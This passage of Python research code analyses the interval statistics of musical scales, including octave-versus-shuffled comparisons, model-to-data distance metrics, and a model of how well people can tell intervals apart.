sns.distplot(np.abs(oct_real-octave), bins=np.arange(0, w+10, 10), kde=False, norm_hist=True, ax=ax[0])
sns.distplot(np.abs(oct_shuf-octave), bins=np.arange(0, w+10, 10), kde=False, norm_hist=True, ax=ax[0])
sns.distplot(oct_real, bins=np.arange(octave-w, octave+w+10, 10), kde=False, norm_hist=True, ax=ax[1])
sns.distplot(oct_shuf, bins=np.arange(octave-w, octave+w+10, 10), kde=False, norm_hist=True, ax=ax[1])
print(mannwhitneyu(np.abs(oct_real-octave), np.abs(oct_shuf-octave)))
print(np.mean(np.abs(oct_real-octave)))
print(np.mean(np.abs(oct_shuf-octave)))
def label_sig(p):
if p >= 0.05:
return "NS"
elif p >= 0.005:
return '*'
elif p >= 0.0005:
return '**'
elif p >= 0.00005:
return '***'
def octave_chance_individual(df, n_rep=50, plot=False, octave=1200, w1=100, w2=20):
df = df.loc[df.scale.apply(lambda x: x[-2] >= octave)]
ints = df.Intervals.values
res = pd.DataFrame(columns=["max_scale", "n_notes", "ints", "oct_real", "oct_shuf", "mean_real", "mean_shuf", "MWU", "f_real", "f_shuf"])
for i in ints:
all_ints = np.array([x for j in range(len(i)) for x in np.cumsum(i[j:])])
oct_real = all_ints[(all_ints>=octave-w1)&(all_ints<=octave+w1)]
f_real = sum(np.abs(all_ints-octave)<=w2) / len(all_ints)
mean_real = np.mean(np.abs(oct_real-octave))
shuffled_ints = []
for j in range(n_rep):
ran = np.random.choice(i, replace=False, size=len(i))
for k in range(len(ran)):
for m in np.cumsum(ran[k:]):
shuffled_ints.append(m)
shuffled_ints = np.array(shuffled_ints)
idx = (shuffled_ints>=octave-w1)&(shuffled_ints<=octave+w1)
oct_shuf = shuffled_ints[idx]
f_shuf = sum(np.abs(shuffled_ints-octave)<=w2) / len(shuffled_ints)
mean_shuf = np.mean(np.abs(oct_shuf-octave))
try:
mwu = mannwhitneyu(np.abs(oct_real-octave), np.abs(oct_shuf-octave))[1]
except ValueError:
mwu = 1
res.loc[len(res)] = [sum(i), len(i), i, oct_real, oct_shuf, mean_real, mean_shuf, mwu, f_real, f_shuf]
res['sig'] = res.MWU.apply(label_sig)
return res
def create_new_scales(df, n_rep=10):
ints = [x for y in df.Intervals for x in y]
n_notes = df.scale.apply(len).values
df_list = []
for i in range(n_rep):
new_ints = [np.random.choice(ints, replace=True, size=n) for n in n_notes]
new_df = df.copy()
new_df.Intervals = new_ints
new_df['scale'] = new_df.Intervals.apply(np.cumsum)
df_list.append(new_df)
return df_list
def ideal_scale(ints, sigma):
N = len(ints)
imax = np.argmin(np.abs(np.cumsum(ints)-1200))
ints = ints[:imax]
ints = ints * 1200 / np.sum(ints)
new_ints = np.array([ints[i%len(ints)] for i in range(N)])
return new_ints + np.random.normal(0, sigma, size=N)
def create_ideal_scales(df):
ints = [x for y in df.Intervals for x in y if x < 800]
n_notes = df.scale.apply(len).values
sigma = np.arange(0, 55, 5)
df_list = []
for s in sigma:
new_ints = [ideal_scale(np.random.choice(ints, replace=True, size=n), s) for n in n_notes]
new_df = df.copy()
new_df.Intervals = new_ints
df_list.append(new_df)
return sigma, df_list
def get_stats(df, i, k, w1=100, w2=20, n_rep=50, nrep2=100):
out = np.zeros((3,nrep2), float)
path = f"../IntStats/{k}_w1{w1}_w2{w2}_I{i:04d}.npy"
print(path)
for j in range(nrep2):
res = octave_chance_individual(df, octave=i, n_rep=n_rep, w1=w1, w2=w2)
out[0,j] = len(res.loc[(res.MWU<0.05)&(res.mean_real<res.mean_shuf)])
out[1,j] = len(res.loc[(res.MWU<0.05)&(res.mean_real>res.mean_shuf)])
out[2,j] = len(res.loc[(res.MWU>=0.05)])
np.save(path, out)
return out.mean(axis=1)
def get_inst_subsample(df, xsamp, N):
idx = []
for x in df[xsamp].unique():
x_idx = df.loc[df[xsamp]==x].index
idx.extend(list(np.random.choice(x_idx, replace=True, size=min(N, len(x_idx)))))
return df.loc[idx]
def unexpected_intervals(df):
ints = np.arange(200, 2605, 5)
for c in df['Region'].unique():
alt_df = df.loc[df["Region"]!=c]
with Pool(N_PROC) as pool:
res = pool.starmap(get_stats, product([alt_df], ints, [c], [100], [20]), 7)
for i in range(3):
alt_df = get_inst_subsample(df, 'Region', 10)
with Pool(N_PROC) as pool:
res = pool.starmap(get_stats, product([alt_df], ints, [f"contsamp{i}"], [100], [20]), 5)
for i in range(3):
alt_df = get_inst_subsample(df, 'Culture', 5)
with Pool(N_PROC) as pool:
res = pool.starmap(get_stats, product([alt_df], ints, [f"cultsamp{i}"], [100], [20]), 5)
df = df.loc[:, ['Intervals', 'scale']]
w1_list = [50, 75, 100, 125, 150, 175, 200]
w2_list = [5, 10, 15, 20, 30, 40]
for w1 in w1_list:
for w2 in w2_list:
with Pool(N_PROC) as pool:
res = pool.starmap(get_stats, product([df], ints, [0], [w1], [w2]), 7)
alt_df = create_new_scales(df, n_rep=3)
with Pool(N_PROC) as pool:
for i in range(3):
res = pool.starmap(get_stats, product([alt_df[i]], ints, [i+1]), 9)
sigma, ideal_df = create_ideal_scales(df)
with Pool(N_PROC) as pool:
for i, s in enumerate(sigma):
res = pool.starmap(get_stats, product([ideal_df[i]], ints, [f"sigma{s}"]), 9)
def get_norm_posterior(Y, s, m):
n = len(Y)
sy = np.sum(Y)
sy2 = np.sum(np.square(Y))
a = n / (2 * s**2)
b = sy / (s**2)
c = - sy2 / (2 * s**2)
A = 0.5 * (sy2 + n * m**2 - 2 * m * sy)
left = (a/np.pi)**0.5 * np.exp(-a * m**2 + b * m - b**2 / (4*a))
right = A**(n/2) / (2*np.pi*n) * np.exp(-A / s**2 - n*np.log(n)-1) / s**(n+2)
return left * right
def evaluate_best_fit_lognorm(df):
Y = [x for c in df.Region.unique() for y in np.random.choice(df.loc[df.Region==c, "AllInts"], size=6) for x in y]
Yl = np.log(np.array(Y))
s_arr = np.linspace(0, 2, 1001)[1:]
m_arr = np.linspace(np.log(25), np.log(6000), 1001)
si, mi = np.meshgrid(s_arr, m_arr)
return get_norm_posterior(Yl, si, mi)
def get_int_prob_via_sampling(df, ysamp='AllInts', xsamp='Region', s=6, ax='', fa=0.5):
if len(xsamp):
Y = [x for c in df[xsamp].unique() for y in np.random.choice(df.loc[df[xsamp]==c, ysamp], size=s) for x in y]
else:
Y = [x for y in df[ysamp] for x in y]
# Yl = np.log(np.array(Y))
# print(norm.fit(Yl))
col = np.array(Set2_8.mpl_colors)
bins = np.arange(15, 5000, 30)
dx = np.diff(bins[:2])
X = bins[:-1] + dx / 2.
# shape, loc, scale = lognorm.fit(Y)
shape, loc, scale = [0.93, -45.9, 605.4]
params = lognorm.fit(Y, loc=loc, scale=scale)
print(params)
boot = np.array([np.histogram(lognorm.rvs(*params, len(Y)), bins=bins, density=True)[0] for i in range(10000)])
if isinstance(ax, str):
fig, ax = plt.subplots()
count = np.histogram(Y, bins=bins)[0]
hist = np.histogram(Y, bins=bins, density=True)[0]
p1 = lognorm.pdf(X, *params)
p2 = lognorm.pdf(bins, *params)
p3 = np.array([0.5*(lo+hi) * dx for lo, hi in zip(p2[:-1], p2[1:])])
ax.plot(X, hist, '-', c=col[1], lw=0.9)
ax.plot(X, p1, ':k')
ax.fill_between(X, *[np.quantile(boot, q, axis=0) for q in [0.01, 0.99]], color=col[0], alpha=fa)
# for imax in argrelmax(hist)[0]:
# p = p3[imax]**count[imax]
# print(X[imax], p3[imax], count[imax], sum(count))
if __name__ == "__main__":
df = instrument_tunings()
unexpected_intervals(df)
```
#### File: Src/Analysis/database_sensitivity.py
```python
import argparse
import glob
import os
import pickle
import sys
import time
from itertools import product
import matplotlib.pyplot as plt
import multiprocessing as mp
import numpy as np
import pandas as pd
import seaborn as sns
import statsmodels.nonparametric.api as smnp
import swifter
import utils
import graphs
N_PROC = 10
BASE_DIR = '/home/johnmcbride/projects/Scales/Data_compare/'
RAW_DIR = '/home/johnmcbride/projects/Scales/Toy_model/Data/Raw/'
PRO_DIR = '/home/johnmcbride/projects/Scales/Toy_model/Data/Processed/'
REAL_DIR = os.path.join(BASE_DIR, 'Processed/Real', 'Samples')
DIST_DIR = os.path.join(BASE_DIR, 'Processed/Real', 'Sample_dist')
def calc_relative_entropy(pk, qk):
RE = 0.0
for i in range(len(pk)):
if pk[i] <= 0 or qk[i] <= 0:
pass
else:
RE += pk[i] * np.log(pk[i] / qk[i])
return RE
def calc_jensen_shannon_distance(pk, qk):
mk = 0.5 * (pk + qk)
return (0.5 * (calc_relative_entropy(pk, mk) + calc_relative_entropy(qk, mk))) ** 0.5
def smooth_dist_kde(df, cat='pair_ints', hist=False, nbins=1202):
X = [float(x) for y in df.loc[:,cat] for x in y.split(';')]
kde = smnp.KDEUnivariate(np.array(X))
kde.fit(kernel='gau', bw='scott', fft=1, gridsize=10000, cut=20)
grid = np.linspace(0, 1200, num=nbins-1)
y = np.array([kde.evaluate(x) for x in grid]).reshape(nbins-1)
if hist:
xtra = (nbins-2)/1200./2.
bins = np.linspace(-xtra, 1200+xtra, num=nbins)
hist, bins = np.histogram(X, bins=bins, normed=True)
return grid, y, hist
else:
return grid, y
def get_KDE(df, cat):
xKDE, yKDE = smooth_dist_kde(df, cat=cat)
return yKDE / np.trapz(yKDE)
def get_dists_file(s, cat='pair_ints', nbins=1202):
out = {}
if not os.path.exists(os.path.join(DIST_DIR, f"{s}_n7_hist.npy")):
df = pd.read_feather(os.path.join(REAL_DIR, f"{s}.feather"))
for n in [5,7]:
fHist = os.path.join(DIST_DIR, f"{s}_{cat}_n{n}_hist.npy")
fKDE = os.path.join(DIST_DIR, f"{s}_{cat}_n{n}_kde.npy")
if os.path.exists(fHist):
X, hist = np.load(fHist)
X, kde = np.load(fKDE)
else:
X, kde, hist = smooth_dist_kde(df.loc[df.n_notes==n], cat=cat, hist=True, nbins=nbins)
np.save(fHist, np.array([X, hist]))
np.save(fKDE, np.array([X, kde]))
out[n] = [X, kde, hist]
return out
def how_much_real_scales_predicted(df, n_real, w, s):
# try:
return float(len(set([int(x) for y in df[f"{s}_w{w:02d}"] for x in y.split(';') if len(y)]))) / float(n_real)
# except:
# return None
def rename_processed_files(f, s='sample_'):
root, fName = os.path.split(f)
print(root, fName)
return os.path.join(root, f"{s}{fName}")
def load_model_filenames():
paths = pickle.load(open(os.path.join(BASE_DIR, 'best_models.pickle'), 'rb'))
return [rename_processed_files(paths[k][n]) for k, n in product(paths.keys(), [5,7])]
def calculate_metrics(y1, y2):
y1 = y1.reshape(y1.size)
y2 = y2.reshape(y2.size)
err_sq = np.sqrt(np.dot(y1-y2, y1-y2))
d1 = y1[1:] - y1[:-1]
d2 = y2[1:] - y2[:-1]
deriv_es = np.sqrt(np.dot(d1-d2, d1-d2))
return [err_sq, deriv_es, (err_sq * deriv_es)**0.5]
def scale_rsq(Y1, Y2):
SStot = np.sum((Y1 - np.mean(Y1))**2)
SSres = np.sum((Y1 - Y2)**2)
return 1 - SSres/SStot
if __name__ == "__main__":
timeS = time.time()
parser = argparse.ArgumentParser(description='Process some integers.')
parser.add_argument('--partabase', action='store', default='None', type=str)
args = parser.parse_args()
categories = ['pair_ints', 'scale']
n_arr = np.arange(4,10,dtype=int)
samples = ['theory', 'instrument'] + [f"sample_f{frac:3.1f}_{i:02d}" for frac in [0.4, 0.6, 0.8] for i in range(10)]
files = [f"{s}.feather" for s in samples]
int_dists = [get_dists_file(s) for s in samples]
hist_dists = [get_dists_file(s, cat='scale', nbins=42) for s in samples]
# print(f"Real scales loaded after {(time.time()-timeS)/60.} minutes")
pro_files = load_model_filenames()
def extract_stats_each_model(fName):
df = pd.read_feather(fName)
bits = os.path.split(fName)[1].split('_')
n = int(bits[1].strip('n'))
idx = [i for i in range(len(bits)) if bits[i][0]=='M'][0]
bias = '_'.join(bits[2:idx])
mi = int(bits[idx].strip('MI'))
ma = int(bits[idx+1].strip('MA'))
beta = float(bits[-1].strip('.feather'))
n_sample = df.n_att.sum()
q = float(len(df))/float(n_sample)
output = [n, mi, ma, bias, beta, q, n_sample]
X, iKDE, iHist = smooth_dist_kde(df, cat='pair_ints', hist=True)
X, sKDE, sHist = smooth_dist_kde(df, cat='scale', hist=True, nbins=42)
for i, f in enumerate(files):
df_real = pd.read_feather(os.path.join(REAL_DIR, f))
n_real = len(df_real.loc[df_real.n_notes==n])
frac_real = [how_much_real_scales_predicted(df, n_real, w, f'{samples[i]}_ss') for w in [10, 20]]
metrics = calculate_metrics(int_dists[i][n][1], iKDE)
scale_R2 = scale_rsq(sHist,hist_dists[i][n][2])
output.extend([n_real] + frac_real + metrics + [scale_R2])
return output + [fName]
biases = ['none',
'distI_1_0', 'distI_2_0', 'distI_3_0', 'distI_0_1', 'distI_0_2',
'distI_1_1', 'distI_2_1', 'distI_1_2', 'distI_2_2',
'opt_c', 'opt_c_I1', 'opt_c_I2', 'opt_c_s2', 'opt_c_s3'] + \
[f"hs_n{i}_w{w:02d}" for i in range(1,4) for w in [5,10,15,20]] + \
[f"hs_r3_w{w:02d}" for w in [5,10,15,20]] + \
[f"ahs{i:02d}_w{w:02d}" for i in range(1,11) for w in [5,10,15,20]] + \
[f"im5_r{r:3.1f}_w{w:02d}" for r in [0, 0.5, 1, 2] for w in [5,10,15,20]] + \
[f"Nhs_n1_w{w:02d}" for w in [5,10,15,20]] + \
[f"Nhs_n2_w{w:02d}" for w in [5,10,15,20]] + \
[f"Nhs_n3_w{w:02d}" for w in [5,10,15,20]] + \
[f"Nim5_r0.0_w{w:02d}" for w in [5,10,15,20]] + \
[f"TRANSB_{i}" for i in [1,2,3]] + \
[f"TRANS{a}_{b}" for a in ['A', 'B'] for b in range(1,4)] + \
[f"HAR_{b}_{a}" for a in range(1,4) for b in range(5,25,5)] + \
[f"{a}_{b}" for a in ['HAR', 'FIF'] for b in range(5,25,5)]
# ['hs_r3_w05', 'hs_r3_w10', 'hs_r3_w15', 'hs_r3_w20'] + \
# [f"im5_r0.75_w{w:02d}" for w in [5,10,15,20] +
groups = ['none'] + ['distI']*3 + ['S#1']*2 + ['distI_S#1']*4 + \
['distW'] + ['distW_S#1']*2 + ['distW_S#2']*2 + ['HS']*12 + ['im5']*4 + ['AHS']*40 + ['im5']*16 + \
['HS']*12 + ['im5']*4 + ['TRANSB']*3 + \
['TRANS']*6 + ['HAR']*4 + ['HAR2']*4 + ['HAR3']*4 + ['HAR']*4 + ['FIF']*4
bias_groups = {biases[i]:groups[i] for i in range(len(biases))}
with mp.Pool(N_PROC) as pool:
results = list(pool.imap_unordered(extract_stats_each_model, pro_files))
print(f"Model comparison finished after {(time.time()-timeS)/60.} minutes")
df = pd.DataFrame(columns=['n_notes', 'min_int', 'max_int', 'bias', 'beta', 'quantile', 'n_sample'] + \
[f"{s}_{a}" for s in samples for a in ['n_real', 'fr_10', 'fr_20', 'RMSD', 'dRMSD', 'met1', 'sRMSD']] + \
['fName'], data=results)
df['bias_group'] = df.bias.apply(lambda x: bias_groups[x])
df['logq'] = np.log10(df['quantile'])
df = graphs.rename_bias_groups(df)
df = graphs.rename_biases(df)
print(f"DataFrame compiled after {(time.time()-timeS)/60.} minutes")
if args.partabase == 'None':
df.to_feather(os.path.join(BASE_DIR, 'Processed', 'database_sensitivity.feather'))
```
#### File: Distinguishability/Src/calculate_distinguishability.py
```python
import os
import string
import sys
import matplotlib as mpl
import matplotlib.pyplot as plt
import matplotlib.gridspec as gridspec
import multiprocessing as mp
import numpy as np
import pandas as pd
from palettable.colorbrewer.qualitative import Paired_12
import seaborn as sns
import scipy.stats as stats
mpl.rcParams['text.usetex'] = True
mpl.rcParams['text.latex.preamble'] = [r'\usepackage{amsmath}']
INT_MIN = 0.
INT_MAX = 250.
D_INT = 5.
ACC = 0.99
INTS = np.arange(INT_MIN, INT_MAX, D_INT)
FIGS_DIR = '/home/johnmcbride/Dropbox/phd/LaTEX/Scales/Figures/'
def gaussian(x, mean, var):
return np.exp( - (x - mean)**2 / (2. * var)) / (var * 2 * np.pi)**0.5
def integrate_gauss(mean, var, x1, x2, num=1000):
X = np.linspace(x1, x2, num=num)
P = gaussian(X, mean, var)
# return X, P
return np.trapz(P, X)
def get_percentage_correct_from_range_of_ints(dI, prod_var, percep_var, ints=INTS):
correct = []
for I0 in ints:
int_cats = np.arange(0, I0*2, dI)
prob_produced = []
prob_correct = []
for I1 in int_cats:
prod_prob = integrate_gauss(I0, prod_var, I1-dI/2., I1+dI/2.)
percep_prob = [integrate_gauss(i, percep_var, I1-dI/2., I1+dI/2.) for i in [0, I0, I0*2]]
prob_produced.append(prod_prob)
prob_correct.append(percep_prob[1] / sum(percep_prob))
correct.append(np.sum(np.array(prob_produced) * np.array(prob_correct)) / np.sum(prob_produced))
return np.array(correct)
def get_percentage_correct_from_range_of_ints_2(dI, prod_var, percep_var, ints=INTS):
correct = []
for I0 in ints:
int_cats = np.arange(0, I0*2, dI)
prob_produced = []
prob_correct = []
for I1 in int_cats:
prod_prob = integrate_gauss(I0, prod_var, I1-dI/2., I1+dI/2.)
percep_prob = [integrate_gauss(i, percep_var, I1-dI/2., I1+dI/2.) for i in [0, I0]]
prob_produced.append(prod_prob)
prob_correct.append(percep_prob[1] / sum(percep_prob))
correct.append(np.sum(np.array(prob_produced) * np.array(prob_correct)) / np.sum(prob_produced))
return np.array(correct)
def get_interval_by_accuracy(ints, correct, acc=ACC):
try:
i = np.where(correct > acc)[0][0]
except:
i = np.argmin(np.abs(correct - acc))
if i:
return ints[i-1] + (ints[i] - ints[i-1]) * (acc - correct[i-1]) / (correct[i] - correct[i-1])
else:
return ints[0]
def plot_distinguishability_by_grid_size():
dI = 5
dI_arr = [3, 5, 10, 20, 25, 30]
prod_sdev_arr = np.arange(5., 32.5, 2.5)
percep_sdev_arr = np.arange(5., 32.5, 2.5)
fig1, ax1 = plt.subplots(2,3)
ax1 = ax1.reshape(ax1.size)
df_list = []
for i, dI in enumerate(dI_arr):
xi, yi = np.meshgrid(prod_sdev_arr, percep_sdev_arr)
prod_in = xi.ravel()
percep_in = yi.ravel()
pool = mp.Pool(24)
correct = pool.starmap(get_percentage_correct_from_range_of_ints, [(dI, prod_in[i]**2, percep_in[i]**2) for i in range(len(prod_in))])
thresh_list = [get_interval_by_accuracy(INTS, c) for c in correct]
df_list.append(pd.DataFrame(data={'production':prod_in, 'perception':percep_in, 'threshold':thresh_list, 'dI':[dI]*prod_in.size}))
sns.heatmap(df_list[i].pivot('production', 'perception', 'threshold'), ax=ax1[i], vmin=50, vmax=180, annot=True)
ax1[i].invert_yaxis()
ax1[i].set_title(f"dI = {dI}")
# plt.legend(loc='best')
# plt.plot(np.arange(50, 550, 50), thresh_int)
plt.show()
def plot_distinguishability_ranges():
dI = 5
min_prod = [5., 10., 30.]
min_per = [10., 20., 40.]
rang = 27.5
titles = ['expert', 'good_untrained', 'bad_untrained']
fig, ax = plt.subplots(3)
for i in range(3):
prod_sdev_arr = np.arange(min_prod[i], min_prod[i]+rang, 2.5)
percep_sdev_arr = np.arange(min_per[i], min_per[i]+rang, 2.5)
xi, yi = np.meshgrid(prod_sdev_arr, percep_sdev_arr)
prod_in = xi.ravel()
percep_in = yi.ravel()
pool = mp.Pool(28)
correct = pool.starmap(get_percentage_correct_from_range_of_ints, [(dI, prod_in[j]**2, percep_in[j]**2) for j in range(len(prod_in))])
thresh_list = [get_interval_by_accuracy(INTS, c) for c in correct]
annot = np.zeros(xi.shape, dtype='<U3')
np.fill_diagonal(annot, [str(int(x)) for x in np.array(thresh_list).reshape(xi.shape).T.diagonal()])
df = pd.DataFrame(data={'production':prod_in, 'perception':percep_in, 'threshold':thresh_list, 'dI':[dI]*prod_in.size})
sns.heatmap(df.pivot('production', 'perception', 'threshold'), ax=ax[i], vmin=50, vmax=180, annot=annot, fmt="s")
ax[i].invert_yaxis()
ax[i].set_title(titles[i])
plt.show()
def plot_distinguishability_ranges_one_plot():
dI = 5
min_prod = [10., 20., 40.]
min_per = [10., 20., 40.]
rang = 27.5
titles = ['expert', 'good_untrained', 'bad_untrained']
fig, ax = plt.subplots()
prod_sdev_arr = np.arange(5, 57.5, 5)
percep_sdev_arr = np.arange(5, 57.5, 5)
xi, yi = np.meshgrid(prod_sdev_arr, percep_sdev_arr)
prod_in = xi.ravel()
percep_in = yi.ravel()
pool = mp.Pool(28)
correct = pool.starmap(get_percentage_correct_from_range_of_ints, [(dI, prod_in[j]**2, percep_in[j]**2) for j in range(len(prod_in))])
thresh_list = [get_interval_by_accuracy(INTS, c) for c in correct]
annot = np.zeros(xi.shape, dtype='<U3')
np.fill_diagonal(annot, [str(int(x)) for x in np.array(thresh_list).reshape(xi.shape).T.diagonal()])
np.save('Results/annotations', annot)
df = pd.DataFrame(data={'production':prod_in, 'perception':percep_in, 'threshold':thresh_list, 'dI':[dI]*prod_in.size})
df.to_feather(f'Results/three_notes_acc{ACC}.feather')
xticks = np.arange(5, 55, 5)
yticks = np.arange(5, 55, 5)
sns.heatmap(df.pivot('production', 'perception', 'threshold'), ax=ax, vmin=30, vmax=300, annot=annot, fmt="s", xticklabels=xticks, yticklabels=yticks)
ax.invert_yaxis()
ax_scale = 5.0
ax.set_xticks((np.arange(5, 55, 5)-2.5)/ax_scale)
ax.set_yticks((np.arange(5, 55, 5)-2.5)/ax_scale)
plt.savefig('Figs/accurate_intervals.png', dpi=1200)
plt.savefig('Figs/accurate_intervals.pdf', dpi=1200)
# plt.show()
def plot_distinguishability_two_notes():
dI = 5
min_prod = [10., 20., 40.]
min_per = [10., 20., 40.]
rang = 27.5
titles = ['expert', 'good_untrained', 'bad_untrained']
fig, ax = plt.subplots()
prod_sdev_arr = np.arange(2.5, 57.5, 2.5)
percep_sdev_arr = np.arange(2.5, 57.5, 2.5)
xi, yi = np.meshgrid(prod_sdev_arr, percep_sdev_arr)
prod_in = xi.ravel()
percep_in = yi.ravel()
pool = mp.Pool(28)
correct = pool.starmap(get_percentage_correct_from_range_of_ints_2, [(dI, prod_in[j]**2, percep_in[j]**2) for j in range(len(prod_in))])
thresh_list = [get_interval_by_accuracy(INTS, c) for c in correct]
annot = np.zeros(xi.shape, dtype='<U3')
np.fill_diagonal(annot, [str(int(x)) for x in np.array(thresh_list).reshape(xi.shape).T.diagonal()])
df = pd.DataFrame(data={'production':prod_in, 'perception':percep_in, 'threshold':thresh_list, 'dI':[dI]*prod_in.size})
xticks = np.arange(5, 55, 5)
yticks = np.arange(5, 55, 5)
sns.heatmap(df.pivot('production', 'perception', 'threshold'), ax=ax, vmin=30, vmax=300, annot=annot, fmt="s", xticklabels=xticks, yticklabels=yticks)
ax.invert_yaxis()
ax_scale = 2.5
ax.set_xticks((np.arange(5, 55, 5)-2.5)/ax_scale)
ax.set_yticks((np.arange(5, 55, 5)-2.5)/ax_scale)
plt.savefig('Figs/two_notes_accurate_intervals.png', dpi=1200)
plt.savefig('Figs/two_notes_accurate_intervals.pdf', dpi=1200)
# plt.show()
def plot_frac_correct():
fig, ax = plt.subplots()
dI = 2
for std in [5, 10, 20, 40]:
correct = get_percentage_correct_from_range_of_ints(dI, std**2, std**2)
ax.plot(INTS, correct, label=r"$\sigma = {0}$".format(std))
ax.legend(loc='best', frameon=False)
plt.show()
def plot_heatmap():
fig, ax = plt.subplots()
df = pd.read_feather(f'Results/three_notes_acc{ACC}.feather')
annot = np.load('Results/annotations.npy')
xticks = np.arange(5, 55, 5)
yticks = np.arange(5, 55, 5)
sns.heatmap(df.pivot('production', 'perception', 'threshold'), ax=ax, vmin=30, vmax=300, annot=annot, fmt="s", xticklabels=xticks, yticklabels=yticks)
ax.invert_yaxis()
ax_scale = 5.0
ax.set_xticks((np.arange(5, 55, 5)-2.5)/ax_scale)
ax.set_yticks((np.arange(5, 55, 5)-2.5)/ax_scale)
plt.savefig('Figs/accurate_intervals.png', dpi=1200)
plt.savefig('Figs/accurate_intervals.pdf', dpi=1200)
def plot_SI():
fig = plt.figure(figsize=(10,5))
gs = gridspec.GridSpec(2,3, width_ratios=[1.0, 1.0, 1.8], height_ratios=[1.0, 1.0])
gs.update(wspace=0.30 ,hspace=0.40)
ax = [fig.add_subplot(gs[0,0]),fig.add_subplot(gs[1,0]),fig.add_subplot(gs[:,1]),fig.add_subplot(gs[:,2])]
std = 20
X = np.linspace(0, 200, num=1000)
ax[0].plot(X, stats.norm.pdf(X, 100, std), label=f"Category A", c='k')
col = ['k'] + list(np.array(Paired_12.mpl_colors)[[1,3,5]])
cat = [f"Category {s}" for s in 'ABC']
Y = []
for i, mu in enumerate([100, 50, 150]):
Y.append(stats.norm.pdf(X, mu, std))
# ax[1].plot(X, stats.norm.pdf(X, mu, std), label=cat[i], c=col[i])
Y = np.array(Y)
ysum = np.sum(Y, axis=0)
Y = Y/ysum
for i, mu in enumerate([100, 50, 150]):
ax[1].plot(X, Y[i], '-', label=cat[i], c=col[i])
ax[0].set_xlabel("Produced interval")
ax[1].set_xlabel("Produced interval")
ax[0].set_ylabel("Probability")
ax[1].set_ylabel(r"$P_{Cat}$")
ax[0].set_ylim(0, 0.035)
ax[1].set_ylim(0, 1.70)
ax[0].set_yticks([])
ax[1].set_yticks([0,1])
for a in ax[:2]:
a.legend(loc='upper right', frameon=False)
dI = 2
for i, std in enumerate([5, 10, 20, 40]):
correct = get_percentage_correct_from_range_of_ints(dI, std**2, std**2)
line, = ax[2].plot(INTS, correct, label=r"$\sigma = {0}$".format(std), c='k')
line.set_dashes([12-i*2-3, 3+i*0])
ax[2].legend(loc='best', frameon=False)
ax[2].plot([0,250],[.99]*2, '-', c=col[3], alpha=0.7)
ax[2].set_xlim(0, 250)
ax[2].set_xlabel(r'$I_{\textrm{min}}$')
ax[2].set_ylabel("Fraction correctly perceived")
df = pd.read_feather(f'Results/three_notes_acc{ACC}.feather')
annot = np.load('Results/annotations.npy')
xticks = np.arange(5, 55, 5)
yticks = np.arange(5, 55, 5)
sns.heatmap(df.pivot('production', 'perception', 'threshold'), ax=ax[3], vmin=30, vmax=300,
annot=annot, fmt="s", xticklabels=xticks, yticklabels=yticks, cbar_kws={'label':r'$I_{\textrm{min}}$'})
ax[3].invert_yaxis()
ax_scale = 5.0
ax[3].set_xticks((np.arange(5, 55, 5)-2.5)/ax_scale)
ax[3].set_yticks((np.arange(5, 55, 5)-2.5)/ax_scale)
ax[3].set_xlabel(r'$\sigma_{per}$')
ax[3].set_ylabel(r'$\sigma_{prod}$')
X = [-0.11, -0.11, -0.27, -0.17]
Y = [1.05, 1.05, 1.02, 1.02]
for i, a in enumerate(ax):
a.text(X[i], Y[i], string.ascii_uppercase[i], transform=a.transAxes, weight='bold', fontsize=16)
plt.savefig(FIGS_DIR + 'transmission_model.pdf', bbox_inches='tight')
if __name__ == "__main__":
# plot_distinguishability_ranges()
# plot_distinguishability_ranges_one_plot()
# plot_distinguishability_two_notes()
# plot_frac_correct()
# plot_heatmap()
plot_SI()
```
#### File: Src/MonteCarlo/post_processing.py
```python
import argparse
import glob
import os
import sys
import time
from itertools import product, permutations
import matplotlib.pyplot as plt
import multiprocessing as mp
import numpy as np
import pandas as pd
import seaborn as sns
import statsmodels.nonparametric.api as smnp
import swifter
N_PROC = 1
CHUNK = 25
MIX = False
BASE_DIR = '/home/jmcbride/Scales/Compared_data'
RAW_DIR = '/home/jmcbride/Scales/Toy_model/Data/Raw/'
PRO_DIR = '/home/jmcbride/Scales/Toy_model/Data/Processed/'
DIST_DIR = '/home/jmcbride/Scales/Toy_model/Data/None_dist/'
REAL_DIR = '/home/jmcbride/Scales/Real_scales'
TEMP_MIN = 50.
TEMP_MAX = 300.
TEMP_LOW_MARGIN = 0.50
TEMP_HI_MARGIN = 1.50
N_TRIALS = 50
ALPHA_W = 0.1
def parse_arguments():
parser = argparse.ArgumentParser(description='Process some integers.')
parser.add_argument('--partabase', action='store', default='None', type=str)
parser.add_argument('-f', action='store', default='None', dest='fName', type=str)
parser.add_argument('--sample', action='store_true', default=False, dest='sample',)
return parser.parse_args()
args = parse_arguments()
def get_scale_from_pair_ints(pair_ints):
ints = [int(y) for y in pair_ints.split(';')]
return ';'.join(['0'] + [str(y) for y in np.cumsum(ints)])
def calculate_most_harmonic_neighbour(int_cents, sim_only=False, CENT_DIFF_MAX=22):
best_ratio = [1,1]
max_similarity = 0.0
cents = 0.0
for x in np.arange(1,75, dtype=float):
cent_diff = 1200.*np.log10((x+1.)/x)/np.log10(2.) - int_cents
if cent_diff > CENT_DIFF_MAX:
continue
for y in np.arange(x+1.,99., dtype=float):
cent_diff = abs(1200.*np.log10(y/x)/np.log10(2.)- int_cents)
if cent_diff > CENT_DIFF_MAX:
continue
simil = ((x+y-1.)/(x*y))*100.
if simil > max_similarity:
cents = 1200.*np.log10(y/x)/np.log10(2.)
best_ratio = [y,x]
max_similarity = simil
if sim_only:
return max_similarity
else:
return max_similarity, best_ratio, cents
def get_attractors(n, dI=5., diff=22):
sc_i = np.arange(dI, 1200.+dI, dI)
sc_f = set()
attract = []
ratios = []
simils = []
for s in sc_i:
max_similarity, best_ratio, cents = calculate_most_harmonic_neighbour(s, CENT_DIFF_MAX=diff)
if max_similarity == 0.0:
continue
if round(cents,2) not in sc_f:
sc_f.add(round(cents,2))
attract.append(round(cents,2))
ratios.append(best_ratio)
simils.append(max_similarity**n / 100.**(n-1))
return sc_i, np.array(attract), ratios, simils
def get_similarity_of_nearest_attractor(x, sc_f, simil):
minIdx = np.argmin(np.abs(sc_f - x))
return simil[minIdx]
def get_harmonic_similarity_score_series(series, diff, n):
sc_i, sc_f, ratios, simil = get_attractors(n, diff=diff)
return series.swifter.apply(lambda x: np.mean([get_similarity_of_nearest_attractor(float(y), sc_f, simil) for y in x.split(';')]))
def calculate_optimum_window_size(df):
def fn(x):
w_arr = np.arange(15,61)
d_arr = []
n_arr = []
for w in w_arr:
dists = calculate_distance_between_windows(x, w)
